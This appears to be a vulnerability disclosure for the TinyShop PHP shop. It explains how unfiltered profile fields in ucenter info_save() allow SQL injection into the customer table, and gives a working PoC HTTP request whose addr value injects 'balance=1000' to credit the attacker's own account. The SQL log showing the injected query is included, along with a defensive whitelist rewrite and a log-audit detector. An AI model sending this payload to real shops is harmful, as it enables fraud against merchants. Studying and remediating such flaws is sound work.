### Brief description:
I heard the general-purpose category is getting a boost, so here is a test.
### Details:
I saw a balance-manipulation (free money) vulnerability in it before; it was patched, but on a later look it still works. Only the earlier issue of POST parameters overwriting the data array was fixed.
/protected/controllers/ucenter.php, line 393
```php
public function info_save()
{
    $rules = array('name:required:昵称不能为空!','real_name:required:真实姓名不能为空!','sex:int:性别必需选择!','birthday:date:生日日期格式不正确!','mobile:mobi:手机格式不正确','phone:phone:电话格式不正确');
    $info = Validator::check($rules);
    if(is_array($info)){
        $this->redirect("info",false,array('msg'=>array("info",$info['msg'])));
    }else{
        $data = array(
            'name'=>Filter::str(Req::args('name')),
            'real_name'=>Filter::str(Req::args('real_name')),
            'sex'=>Filter::int(Req::args('sex')),
            // the following values go into the UPDATE without SQL filtering
            'birthday'=>Req::args('birthday'),
            'mobile'=>Req::args('mobile'),
            'phone'=>Req::args('phone'),
            'province'=>Req::args('province'),
            'city'=>Req::args('city'),
            'county'=>Req::args('county'),
            'addr'=>Filter::text(Req::args('addr'))
        );
    }
    $name = Filter::sql(Req::args("name"));
    $id = $this->user['id'];
    $this->model->table("user")->data(array("name"=>$name))->where("id=$id")->update();
    // $data is written to the customer table, which also holds the balance column
    $this->model->table("customer")->data($data)->where("user_id=$id")->update();
    $obj = $this->model->table("user as us")->join("left join customer as cu on us.id = cu.user_id")->fields("us.*,cu.group_id,cu.login_time")->where("us.id=$id")->find();
    $this->safebox->set('user',$obj,$this->cookie_time);
    $this->redirect("info");
}
```
Looking at the code above, the filtering at the following places is broken:
```php
'birthday'=>Req::args('birthday'),
'mobile'=>Req::args('mobile'),
'phone'=>Req::args('phone'),
'province'=>Req::args('province'),
'city'=>Req::args('city'),
'county'=>Req::args('county'),
'addr'=>Filter::text(Req::args('addr'))
```
This allows SQL injection, but that is not what we care about here: the user's account balance column, `balance`, lives in the same table, so the UPDATE can be used to credit our own account directly instead of using the injection for a blind injection.
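The fix a defender wants here is structural rather than another filter: the set of writable columns must come from the code, not from the request, and values must be bound rather than spliced into the SQL text. The following is an added example, not TinyShop's own code; the function names, regexes, length limits and the demo input are this example's assumptions. It builds the customer-table UPDATE from a column whitelist (with `balance` deliberately absent) and per-field validation, and returns a parameterized statement that a PDO prepared statement can execute.

```php
<?php
// Added example (not TinyShop code): whitelist + validation + bound parameters
// for the customer profile update. Names and limits here are assumptions.

// Columns the profile form may write. `balance` is deliberately absent, so no
// request parameter, however named, can ever reach it.
function customer_writable_columns()
{
    return array('real_name', 'sex', 'birthday', 'mobile', 'phone',
                 'province', 'city', 'county', 'addr');
}

// Validate one field. Returns array(true, cleanValue) or array(false, message).
function validate_customer_field($field, $raw)
{
    if (!is_string($raw)) {                       // rejects addr[]=... style input
        return array(false, "$field must be a string");
    }
    $raw = trim($raw);
    switch ($field) {
        case 'real_name':
            return ($raw !== '' && mb_strlen($raw) <= 50)
                ? array(true, $raw) : array(false, 'real_name must be 1-50 characters');
        case 'sex':
            return in_array($raw, array('0', '1', '2'), true)
                ? array(true, (int) $raw) : array(false, 'sex must be 0, 1 or 2');
        case 'birthday':
            $d = DateTime::createFromFormat('Y-m-d', $raw);
            return ($d !== false && $d->format('Y-m-d') === $raw)
                ? array(true, $raw) : array(false, 'birthday must be YYYY-MM-DD');
        case 'mobile':
            return preg_match('/^1[0-9]{10}$/', $raw) === 1
                ? array(true, $raw) : array(false, 'mobile must be 11 digits');
        case 'phone':
            return preg_match('/^[0-9-]{6,20}$/', $raw) === 1
                ? array(true, $raw) : array(false, 'phone may contain digits and hyphens only');
        case 'province':
        case 'city':
        case 'county':
            return ctype_digit($raw)
                ? array(true, (int) $raw) : array(false, "$field must be a numeric region code");
        case 'addr':
            return mb_strlen($raw) <= 200
                ? array(true, $raw) : array(false, 'addr must be at most 200 characters');
    }
    return array(false, "$field is not a writable column");
}

// Build the UPDATE. Returns array('sql'=>..., 'params'=>...) or array('errors'=>...).
function build_customer_update(array $args, $userId)
{
    $errors = array();
    $set    = array();
    $params = array();
    foreach (customer_writable_columns() as $field) {   // iterate the whitelist, not the request
        if (!array_key_exists($field, $args)) {
            continue;                                    // untouched column keeps its value
        }
        list($ok, $value) = validate_customer_field($field, $args[$field]);
        if (!$ok) {
            $errors[] = $value;
            continue;
        }
        $set[] = "`$field` = :$field";                   // column name is a code constant
        $params[":$field"] = $value;                     // value is bound, never concatenated
    }
    if ($errors) {
        return array('errors' => $errors);
    }
    $params[':user_id'] = (int) $userId;
    return array(
        'sql'    => 'UPDATE tiny_customer SET ' . implode(', ', $set) . ' WHERE user_id = :user_id',
        'params' => $params,
    );
}

// Constructed demo input in the shape of the PoC request above.
$demo = build_customer_update(array(
    'real_name' => '1', 'sex' => '0', 'birthday' => '2014-09-30',
    'mobile' => '13900000001', 'phone' => '13222222222',
    'province' => '420000', 'city' => '421300', 'county' => '421301',
    'addr' => "111111',balance=1000#",
    'balance' => '1000',          // extra key is silently ignored: not in the whitelist
), 4);
echo $demo['sql'], "\n";          // SET clause names only whitelisted columns
echo $demo['params'][':addr'], "\n"; // the quote and "balance=1000" are plain data in a bound value
```

Execute the result with `$pdo->prepare($demo['sql'])->execute($demo['params'])`; because the column list is fixed in code and every value travels as a bound parameter, the `addr` payload from the PoC can neither close the string literal nor introduce an assignment to `balance`. The `name` column on the user table is updated separately in the original and is left out of this example.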
### Proof of vulnerability:
PoC:
```http
POST /tinyshop/index.php?con=ucenter&act=info_save HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://localhost/tinyshop/index.php?con=ucenter&act=info
Cookie: CNZZDATA80862620=cnzz_eid%3D163438544-1407551214-http%253A%252F%252Flocalhost%252F%26ntime%3D1408007142; bdshare_firstime=1407551237892; tm_ibc=0; ZDEDebuggerPresent=php,phtml,php3; CNZZDATA1670348=cnzz_eid%3D2114245156-1409299086-http%253A%252F%252Flocalhost%252F%26ntime%3D1409299086; ver=free; PHPSESSID=f2943c79c9d287ef2a0136f0525e9fb3; language=5ad2ae3c20c17a82d4b61aaa71f61e05f5b4a0a2s%3A5%3A%22zh_cn%22%3B; 1_product=f5de13e802a02fac20482edfe9ee2d303641bc6ds%3A1%3A%221%22%3B; pageSize=7fe99f844d5233ed16ab2d46f0b885fe7b213e04s%3A2%3A%2220%22%3B; safecode=1; Tiny_autologin=ed6460c9a8OTU2Nzg2NTAwMmFiNDQ9NTsyMzBjOGJlNjAyZjJlY2c
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 161
name=test1%40qq.com&real_name=1&sex=0&birthday=2014-09-30&mobile=13900000001&phone=13222222222&province=420000&city=421300&county=421301&addr=111111',balance=1000#
```
SQL query log:
```
187323 Query update tiny_customer set `real_name` = '1',`sex` = 0,`birthday` = '2014-09-30',`mobile` = '13900000001',`phone` = '13222222222',`province` = 420000,`city` = 421300,`county` = 421301,`addr` = '111111',balance=1000#' where user_id=4
```
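The general query log above is also the place to detect this class of tampering after the fact: the query builder always emits assignments as `` `column` = value ``, so any residue in the SET clause that is not of that form, or any column outside the profile set, is a sign that a value escaped its string literal. The following is an added example, not part of the original report; the function name and the two constructed log lines are assumptions, and the allowed-column list mirrors the fields of `info_save()`.

```php
<?php
// Added example (not TinyShop code): audit MySQL general-log lines for
// customer-table UPDATEs whose SET clause contains anything the profile
// form's query builder would not have produced.

function audit_customer_update_log(array $lines)
{
    $allowed = array('name', 'real_name', 'sex', 'birthday', 'mobile', 'phone',
                     'province', 'city', 'county', 'addr');
    $findings = array();
    foreach ($lines as $line) {
        // <query id> Query update tiny_customer set <assignments> where <condition>
        if (!preg_match('/^\s*(\d+)\s+Query\s+update\s+tiny_customer\s+set\s+(.*?)\s+where\s+(.*)$/i',
                        $line, $m)) {
            continue;
        }
        $queryId   = $m[1];
        $setClause = $m[2];
        $columns   = array();
        // Consume every well-formed assignment: `col` = 'string literal' or `col` = number.
        // Whatever is left over was not written by the query builder.
        $residue = preg_replace_callback(
            '/`([a-z_]+)`\s*=\s*(\'(?:[^\'\\\\]|\\\\.)*\'|-?\d+)\s*,?\s*/i',
            function ($a) use (&$columns) { $columns[] = strtolower($a[1]); return ''; },
            $setClause
        );
        $unexpected = array_diff($columns, $allowed);
        $residue    = trim($residue);
        if ($unexpected || $residue !== '') {
            $findings[] = array(
                'query_id'           => $queryId,
                'unexpected_columns' => array_values($unexpected),
                'residue'            => $residue,   // e.g. "balance=1000#'"
                'where'              => $m[3],
            );
        }
    }
    return $findings;
}

// Constructed sample: one benign line and the injected line from the report.
$sample = array(
    "187322 Query update tiny_customer set `real_name` = '1',`sex` = 0,`addr` = 'Main St 5' where user_id=4",
    "187323 Query update tiny_customer set `real_name` = '1',`sex` = 0,`birthday` = '2014-09-30',"
    . "`mobile` = '13900000001',`phone` = '13222222222',`province` = 420000,`city` = 421300,"
    . "`county` = 421301,`addr` = '111111',balance=1000#' where user_id=4",
);
foreach (audit_customer_update_log($sample) as $f) {
    // Only query 187323 is reported; its residue is the "balance=1000#'" tail.
    echo "query {$f['query_id']}: residue [{$f['residue']}] where {$f['where']}\n";
}
```

Pair a hit from this audit with the application's access log (the `con=ucenter&act=info_save` request at the same timestamp) to identify the account that sent the payload, and compare the customer row's `balance` against the order history before reversing it.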
Let's look at the result:
[![tinyshop_1.jpg](https://images.seebug.org/upload/201409/031517519ca32430289cd834cdba3f5b62f01aca.jpg)](https://images.seebug.org/upload/201409/031517519ca32430289cd834cdba3f5b62f01aca.jpg)